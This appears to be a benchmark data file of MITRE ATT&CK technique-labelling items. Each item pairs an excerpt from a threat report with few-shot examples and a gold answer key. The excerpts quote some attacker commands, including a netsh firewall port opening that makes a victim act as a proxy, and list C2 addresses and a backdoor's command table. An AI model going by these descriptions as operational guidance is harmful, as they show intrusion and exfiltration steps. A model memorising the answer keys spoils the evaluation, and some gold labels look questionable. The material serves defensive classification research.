\\nUser name \u2013 [username]\u201d 102 getProcessList Runs \u201cps aux\u201d to obtain a list of running processes 103 remoteShell Runs supplied command using \u201c/bin/sh\u201d 104 getInstalledAPP Gets a list of installed applications by running the command \u201cls -la /Applications\u201d 105 showBackupIosFolder Checks to see if an IOS device was backed up to the system by running the command \u201cls -la ~/Library/Application\\ Support/MobileSync/Backup/\u201d 106 downloadFileFromPath Uploads a file from a specified path 107 createFileInSystem Downloads a file, specifically provided within the C2 server\u2019s HTTP response 108 execFile Executes a specified file on the system using the NSTask:launch method 109 deletFileFromPath Deletes a specified file using the NSFileManager:removeFileAtPath method 110 takeScreenShot Takes a screenshot using the CGGetActiveDisplayList, CGDisplayCreateImage, NSImage:initWithCGImage methods\n\t - T1070.006: Indicator Removal - Timestomp\n\t - T1071: Application Layer Protocol\n\t - T1106: Native API\n", "input": "\nAfter running the malware, the batch script goes on to cleans up all signs of its existence on the system, this includes: Deletion of all initial files created during installation, as well as all associated files required on disk during initial execution", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: leverages a custom packer to obfuscate its functionality.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation.\n\t - T1027: Obfuscated Files or Information\n- Text: includes a capability to modify the \"beacon\" payload to eliminate known signatures or unpacking methods.\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n", "input": "\nObfuscation While the downloader module is not packed, the backdoor is packed with a modified version of UPX", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.\n\t - T1203: Exploitation for Client Execution\n- Text: RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: Kimsuky has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nAttack chain of Tropic Trooper\u2019s operations Here\u2019s a summary of the attack chain of Tropic Trooper\u2019s recent campaigns: Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft Office\u2019s Equation Editor (EQNEDT32.EXE)", "gold": "- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cannon can download a payload for execution.\n\t - T1105: Ingress Tool Transfer\n- Text: Patchwork has used BITS jobs to download malicious payloads.\n\t - T1197: BITS Jobs\n- Text: Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\ndownloads another dropper from its C2 server.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 used batch scripts to enumerate users on a victim domain controller.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: However, we were able determine a unique, hard-coded user agent used for the C2 communications: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Using AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent\n\t - T1087: Account Discovery\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: BitPaymer can enumerate the sessions for each user logged onto the infected host.\n\t - T1087.001: Account Discovery - Local Account\n", "input": "\ncan obtain a list of users.", "gold": "- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kevin can Base32 encode chunks of output files during exfiltration.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.\n\t - T1027: Obfuscated Files or Information\n- Text: Exfiltration BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration\n\t - T1074: Data Staged\n\t - T1505.003: Server Software Component - Web Shell\n\t - T1132: Data Encoding\n", "input": "\nIt then uses the base64 encoding function with this alphabet to encode the data, which in the above case resulted in: D-7Ig1ngV3PkdouzP974 The Trojan then creates a string of 9 random symbols and appends the encoded ciphertext to this random string", "gold": "- T1573: Encrypted Channel\n- T1027: Obfuscated Files or Information\n- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018\n\t - T1113: Screen Capture\n- Text: EvilGrab has the capability to capture video from a victim machine.\n\t - T1125: Video Capture\n- Text: DanaBot is a modular malware that includes various additional modules; the most popular functionalities of these modules are stealing information from compromised machines and injecting fake forms into popular ecommerce and social media sites to collect payment data. It can also provide full access to infected systems with remote desktop, or mouse and keyboard access by utilizing a VNC plugin.\n\t - T1021.005: Remote Services - VNC\n\t - T1592: Gather Victim Host Information\n", "input": "\nMalware used by is capable of watching the victim's screen.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoshC2 contains modules that allow for use of proxies in command and control.\n\t - T1090: Proxy\n- Text: HOPLIGHT has modified the firewall using netsh.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: Operation Wocao can proxy traffic through multiple infected systems.\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\nuses the command cmd.exe /c netsh firewall add portopening TCP 443 \"adp\" and makes the victim machine function as a proxy server.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload\n\t - T1204.002: User Execution - Malicious File\n\t - T1049: System Network Connections Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1057: Process Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1083: File and Directory Discovery\n- Text: BlackMatter leverages LDAP and SMB protocol to discover all hosts in the AD.\n\t - T1018: Remote System Discovery\n- Text: Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started\n\t - T1135: Network Share Discovery\n", "input": "\nhas used net use to conduct connectivity checks to machines.", "gold": "- T1049: System Network Connections Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1555: Credentials from Password Stores\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: TEMP.Veles has used Mimikatz and a custom tool, SecHack, to harvest credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Frankenstein has harvested credentials from the victim's machine using Empire.\n\t - T1003: OS Credential Dumping\n", "input": "\nThe credentials appear to have been stolen via multiple techniques, including using post-exploition password recovery tools such as MimiKatz or its variant ZhuMimiKatz", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.\n\t - T1020: Automated Exfiltration\n- Text: malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.\n\t - T1010: Application Window Discovery\n- Text: Imminent Monitor has a keylogging module.\n\t - T1056.001: Input Capture - Keylogging\n", "input": "\nThe keylogger will monitor for active application windows and write them to the log in the following format: [Application Name] The keylogger will log a configurable amount of keystrokes (default 50) before sending the log to the C2 server using the following format: [logged keystrokes] The keylogger can handle logging special keys, such as return and the function keys and will report those within the log in the following format; [special character] Infrastructure The XAgentOSX sample we analyzed was configured to use the following IP address and domain names as its C2 servers: 23.227.196[.]215 apple-iclods[.]org apple-checker[.]org apple-uptoday[.]org apple-search[.]info When we analyzed this sample, the domain names that were used as backup C2 locations were not registered; therefore, these domains did not provide any links to additional infrastructure", "gold": "- T1573: Encrypted Channel\n- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan can enumerate the targeted machine's name and GUID.\n\t - T1082: System Information Discovery\n- Text: provides access to the Windows Registry, which can be used to gather information.\n\t - T1012: Query Registry\n- Text: HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n", "input": "\nextracts basic information about the operating system.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Axiom has used spear phishing to initially compromise victims.\n\t - T1566: Phishing\n- Text: The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Mofang's spearphishing emails required a user to click the link to connect to a compromised website.\n\t - T1204.001: User Execution - Malicious Link\n", "input": "\nhas used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.", "gold": "- T1598.003: Phishing for Information - Spearphishing Link", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.\n\t - T1057: Process Discovery\n- Text: DCSrv has masqueraded its service as a legitimate svchost.exe process.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nVerifies that there is no process with the name \u201crsyncd\u201d on the active process list (\u201cdbus-inotifier\u201d if the Trojan does not have root privileges)", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The tool runs the following list of WMI queries: wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace wmic diskdrive get Model, SerialNumber wmic computersystem get Manufacturer, Model, Name, SystemTypec wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages wmic process get Caption,ExecutablePath The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://145.249.105[.]165/resource-store/stockroom-center-service/check.php?fm=[serial number] The C# variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows: spp=[system information from WMI queries] &spvg=[screenshot in JPEG format] Conclusion The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques\n\t - T1047: Windows Management Instrumentation\n\t - T1057: Process Discovery\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Cobalt Strike can enumerate services on compromised hosts.\n\t - T1007: System Service Discovery\n- Text: uses WMI to check for anti-virus software installed on the system.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nenumerates all running processes.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT3 has a tool that looks for files and directories on the local file system.\n\t - T1083: File and Directory Discovery\n- Text: Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account\n\t - T1005: Data from Local System\n- Text: Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.\n\t - T1005: Data from Local System\n\t - T1119: Automated Collection\n", "input": "\ngathers information on victim\u2019s drives and has a plugin for document listing.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn\u2019t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n\t - T1008: Fallback Channels\n- Text: UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.\n\t - T1568: Dynamic Resolution\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n", "input": "\nThe C2 server used by provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.", "gold": "- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT18 uses DNS for C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: SMOKEDHAM has encoded its C2 traffic with Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nFor C2 over HTTP, encodes data with base64 and sends it via the \"Cookie\" field of HTTP requests. For C2 over DNS, converts ASCII characters into their hexadecimal values and sends the data in cleartext.", "gold": "- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This targeting of third party organizations to attack further targets is a risky move on the attackers\u2019 part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents Making sense of MuddyWater When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7\n\t - T1189: Drive-by Compromise\n- Text: Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: In mid-2018, OceanLotus carried out a campaign using documents abusing the weakness exposed by the CVE-2017-11882 vulnerability. One of the malicious documents used by OceanLotus was analysed by 360 Threat Intelligence Center (in Chinese) and includes details about the exploit. Let\u2019s take a look at a similar document\n\t - T1203: Exploitation for Client Execution\n", "input": "\nhas delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.", "gold": "- T1189: Drive-by Compromise", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.\n\t - T1102: Web Service\n- Text: Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: After this data has been aggregated, it is uploaded to a hardcoded command and control (C2) server via HTTP. The data is embedded within the \u2018Cookie\u2019 HTTP header, as seen below\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nIn each iteration of the communications loop, the Trojan will check to see if the modification time of the first file changed, and if it is not updated the Trojan will update the second file by writing the string bc<5 random lowercase characters>. to the file by creating an HTTP POST request to a URL structured as follows: + + \u201c?supportsTeamDrive=true&uploadType=resumable&fields=kind,id,name,mimeType,parents\u201d In one RogueRobin sample (SHA256: f1b2bc0831\u2026), the author did not use the Google Drive URL provided by the actor when issuing the x_mode command, and instead included a \u00a0hardcoded Google Drive URL, as seen in Figure 6", "gold": "- T1102: Web Service\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands.\n\t - T1016: System Network Configuration Discovery\n- Text: SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to \u201crescue\u201d each other if communications are lost with one of the backdoors\n\t - T1124: System Time Discovery\n\t - T1057: Process Discovery\n\t - T1049: System Network Connections Discovery\n\t - T1018: Remote System Discovery\n", "input": "\ncollects information about the Internet adapter configuration.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FunnyDream can send compressed and obfuscated packets to C2.\n\t - T1001: Data Obfuscation\n- Text: FlawedAmmyy has used SEAL encryption during the initial C2 handshake.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nhas encrypted its payload with RC4.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has stolen user's saved passwords from Chrome.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Matryoshka is capable of stealing Outlook passwords.\n\t - T1555: Credentials from Password Stores\n- Text: Turla has gathered credentials from the Windows Credential Manager tool.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n", "input": "\nsteals credentials stored inside Internet Explorer.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.\n\t - T1221: Template Injection\n- Text: PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards\n\t - T1204.002: User Execution - Malicious File\n\t - T1105: Ingress Tool 